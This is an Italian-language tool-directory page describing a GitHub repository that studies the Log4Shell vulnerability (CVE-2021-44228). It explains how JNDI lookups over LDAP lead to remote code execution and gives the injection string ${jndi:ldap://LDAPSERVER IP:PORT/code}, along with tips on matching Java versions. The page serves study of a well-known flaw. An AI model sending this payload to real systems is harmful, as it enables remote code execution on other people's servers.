Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-44228 — Studio della vulnerabilità CVE-2021-44228 | Kitploit
Strumenti/GitHubGitHub/asd58584388/cve-2021-44228
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneStrumento di Accesso RemotoSviluppo Payload
GitHubasd58584388/cve-2021-44228

CVE-2021-44228

Studio della vulnerabilità CVE-2021-44228

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Analisi di CVE-2021-44228

Come funziona?

Di seguito è riportato un processo dettagliato di un caso di iniezione remota sfruttando la vulnerabilità log4shell. Per prima cosa, ci sono 3 parti da conoscere:

  1. Log4j2 consente la registrazione di dati utilizzando una funzione chiamata message lookup substitution, in cui i messaggi di log possono includere dati recuperati dinamicamente da varie fonti. (Supporta JNDI Lookup)

  2. JNDI Lookup: Consente di recuperare dati tramite l'API Java Naming and Directory Interface (JNDI), che può interagire con diversi servizi di directory

  3. LDAP (Lightweight Directory Access Protocol): Utilizzato principalmente per accedere e gestire servizi di informazioni di directory su una rete.


Ecco un semplice esempio di Remote Code Execution:

  1. L'hacker configura sia un server LDAP (accessibile tramite protocollo LDAP, con un riferimento a codice Java malevolo) che un server HTTP (il luogo in cui archiviare il codice malevolo)

    1. Configura un server HTTP nella directory che contiene il codice malevolo compilato:

    2. Configura un server LDAP che memorizzi il riferimento:

      ldap

Scarica lo strumento

  • L'hacker invia un input malevolo (${jndi:ldap://LDAPSERVER IP:PORT/code}) al sistema software che ha installato log4j2

  • Log4j2 utilizza la funzione di lookup per inviare una richiesta al server LDAP

  • Il server LDAP reindirizza le richieste ai server HTTP tramite i riferimenti al codice Java memorizzati nei server LDAP

  • Il server HTTP invia il codice malevolo al sistema software, che lo esegue.

  • Codice malevolo:

    Esecuzione del codice malevolo riuscita:


    IMPORTANTE:

    1. Non è che possiamo usare solo il server LDAP per eseguire codice in remoto; possiamo anche usare altri metodi (come RMI) purché log4j2 esegua con successo la message lookup substitution ed esegua il codice malevolo

    2. Versioni diverse di Java possono rendere il processo di exploit differente (qui stiamo usando java 1.8u112).

    3. Si raccomanda di utilizzare la stessa versione di Java nel codice malevolo del software (server che utilizzano log4j2) o al massimo non superiore alla versione Java del software.

    4. Il codice di lookup in Log4j2: